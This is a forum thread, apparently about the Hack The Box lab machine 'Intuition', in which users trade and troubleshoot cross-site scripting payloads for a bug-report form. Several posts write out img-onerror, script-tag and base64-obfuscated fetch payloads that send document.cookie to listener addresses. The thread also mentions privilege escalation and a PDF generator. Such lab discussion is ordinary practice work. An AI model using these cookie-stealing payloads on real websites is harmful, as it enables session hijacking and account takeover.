HTB - Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
#21
(04-27-2024, 10:00 PM)3kyy Wrote:
(04-27-2024, 09:38 PM)xxxbfacc Wrote: cookie from report_bugs via img tag xss

<img src=x onerror="location.href='10.10.14.8:8888/?c='+ document.cookie">
<script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script>
<script>var i=new Image();i.src="http://10.10.14.8:8888/?c="+document.cookie</script>

don't work for me, and I tried with CSP bypass:

worked?
#22
Anything with priv esc? Got nothing with linpeas or manual enumeration
#23
(04-27-2024, 10:37 PM)andlommy Wrote: <img src=x onerror="eval(atob('')">

works
payload is regular fetch with document cookie in url

tried multiple payloads, none of them work, is there anything we need to do before submitting the bug report with the payload in it? which parameter is affected?
I tried in both params these payloads and none worked...:
<img src=x onerror=eval(atob(this.id)) id=ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC44Ni8/Y29va2llPScrZG9jdW1lbnQuY29va2llKQo=>
<img src="fetch('http://10.10.14.86:80/?cookie='+document.cookie); " onerror="xss(1)">
<img src=x onerror="eval(fetch('http://10.10.14.86:80/?cookie='+document.cookie))">
<img src="non-existing-image.png" onerror="fetch('http://10.10.14.86/?cookie='+document.cookie);" />
<img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://10.10.14.86/?'+document.cookie>
#24
"payload is regular fetch with document cookie in url "

I do not understand.

Like this?

<img src=x onerror="eval(atob('fetch('http://SERVER/?cookie='+document.cookie)')"> but in b64 payload?
#25
Ok. I'm taking a break for a bit. But I'll leave this tidbit.
You need to steal more than one cookie...
#26
report_title=xxx&description=<img src=x onerror=eval(atob('ZmV0Y2goJ2h0dHA6Ly9TRVJWRVI/Y29va2llPScrZG9jdW1lbnQuY29va2llKQ=='))>

Like this?? I cannot get it to work.
#27
anyone help us xss not work why
#28
Yeah I am really confused. Seems pretty straightforward. Just modifying the:
"POST /report_bug
report_title=xxx&description=xxx"
correct? It redirects and I see nothing in my server.
#29
pdf generator seems rabbit holey.
But I'm probably just missing something...
#30
(04-28-2024, 12:54 AM)xxxbfacc Wrote: pdf generator seems rabbit holey.
But I'm probably just missing something...

bro what payload for xss

